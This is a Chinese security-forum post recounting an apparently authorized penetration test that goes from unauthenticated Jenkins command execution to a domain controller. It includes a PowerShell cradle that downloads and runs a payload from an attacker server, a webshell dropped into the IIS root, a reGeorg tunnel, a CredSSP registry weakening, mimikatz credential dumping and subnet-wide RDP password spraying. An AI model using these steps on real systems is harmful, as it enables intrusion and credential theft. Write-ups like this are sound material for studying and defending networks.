安全矩阵

 找回密码
 立即注册
搜索
查看: 2324|回复: 0

从Jenkins未授权到拿下域控的过程

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-6-2 15:03:52 | 显示全部楼层 |阅读模式
从Jenkins未授权到拿下域控的过程香白菜 HACK之道 今天
目标

任务:从外网进入内网服务器,获取资产内网漫游,拿到域控
客户给定资产:http://122.x.x.205:8080/
0x01 入口很幸运找到一个Jenkins漏洞 可以命令执行 默认system权限
通过println "cmd.exe /c whoami".execute().text执行命令得到结果为

简单收集了下信息:
Windows2012 x64 内网服务器 存在杀软
接着cs生成个powershell脚本进行转发,没有上线

  • powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://118.**.**.**/payload.ps1'))"

又换了mshta等等常见反弹手法,均失败,且没有回显,ping百度返回超时,判断服务器没有出网http协议的道已经走不通
尝试走dns隧道53端口协议反弹到cs,需解析配置好域名和vps地址,然后cs里开启dns监听,生成payload,但是dns生成的payload也得上传到shell里运行

既然服务器http不通,远程下载payload并运行的方式也行不通,jsp的war包也不知道放在什么地方
但是发现,80端口开启,是iis管理器的默认主页
dir命令找到iis默认目录C:\inetpub\wwwroot\,再使用echo写入一个asp一句话到网站根目录
成功getshell

计划传aspx大马,结果网站目录任何文件传不了,权限过小

0x02提权之一波三折这里一波三折,后续复盘发现绕了很多弯路,但是作为测试当时的真实情况,记录出来让大家避坑
看到iis权限那就先提个权,再弹个system权限到cs即可,使用了各种提权方法,均提权失败了
尝试传exe文件发现网站就把我测试的ip封了,换和ip刷新文件夹发现缺exe传成功,但是文件破损了
发现服务器装了git工具,测试git clone https://github.com/xxx/ 成功下载文件C:\ProgramData\
what?之前不是不出http协议网吗,netstat -ano看了下

发现有些端口与其他外网的443有连接,所以git clone可以远程下载,这里依次执行了exe、py、ps1都无法上线
突然想到在Jenkins里是system权限,于是找了个可写目录传aspx大马,接着move到网站根目录,拿到aspx大马


在C:\ProgramData\ 目录传了dns协议生成的ps木马,执行没反应,传raw生成的木马放到shellcode免杀里生成exe,执行也无回显
但是另一个朋友说他生成的上线了,自己测试,shell内执行一直转圈也不上线 。无头绪了,已经凌晨四点了,明天再搞(后来设置监听为http 监听端口为443 即可上线)
0x03内网转发起床后理一理思路
既然上不线,用reGeorg转发不也一样,把tunnel.aspx到C:\ProgramData\ move到iis目录访问
成功访问

OK,本地reGeorg.py监听并配置Proxifier
python reGeorgSocksProxy.py -p 446 -u http://122.**.**.**/tunnel.aspx

Proxifier配置:

远程连接即可

提示当前允许连接的用户过多
解决方案:mstsc /admin /v:192.168.15.82

然后还是无法连接
解决方法:
在\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
目录下新建项,在名称中输入CredSSP,在CredSSP上右键单击选择 新建》项 名称中输入Parameters确定,在Parameters上右键单击新建》DWORD(32位)值(D)修改名称为AllowEncryptionOracle 。在AllowEncryptionOracle 上右键单击选择修改,将“数值数据(V)”改为2,
此时确定,关闭所有重新打开mstsc连接发现可以用了。`

成功登录: mstsc /admin /v:192.168.52.18

致此前渗透阶段完成。
0x04横向渗透上传mimikatz抓到当前机器administertor密码
使用超级弱口令扫了下整个b段的rdp,字典内加入抓取到的administertor密码,成功扫到8台机器

并且成功上线cs马
在这台机器的cs里执行hashdump获取登录凭证,并横向到192.168.15.70和76机器





可以看到成功横向上线
经过常规的信息收集,找到192.168.15.14这台机器为域控
到76机器执行mimikatz抓取域用户密码,尝试登录域控没有成功,可能权限不够
接着去看70机器,发现有个ssm服务,(sqlserverManage)此进程极大可能是域管运行,所以这台机器内存中可能存在域管密码,mimikatz抓取


  • Username:Superxxx
  • Domain   : xxxx
  • Password: XXXXXXX


至此成功拿下域控。
0x05技术总结1、通过Jenkins获取入口
2、各种折腾提权以及转发
3、收集主机密码
4、通过收集的密码爆破B端机器
5、通过B端权限抓取域控密码
6、获取域控权限
白名单转载于补天平台。
END

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 04:27 , Processed in 0.012471 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表